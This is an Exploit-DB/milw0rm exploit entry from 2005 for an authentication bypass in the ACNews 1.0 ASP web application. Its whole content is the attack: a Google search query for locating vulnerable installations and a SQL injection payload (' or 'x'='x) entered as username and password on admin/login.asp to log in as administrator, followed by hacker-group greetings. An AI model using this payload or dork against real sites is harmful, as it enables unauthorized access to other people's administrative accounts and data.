ACNews 1.0 - Authentication Bypass

EDB-ID:

925


Author:

LaMeR

Type:

webapps


Platform:

ASP

Date:

2005-04-09


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

auther : LaMeR

securitygurus team

# milw0rm.com [2005-04-09]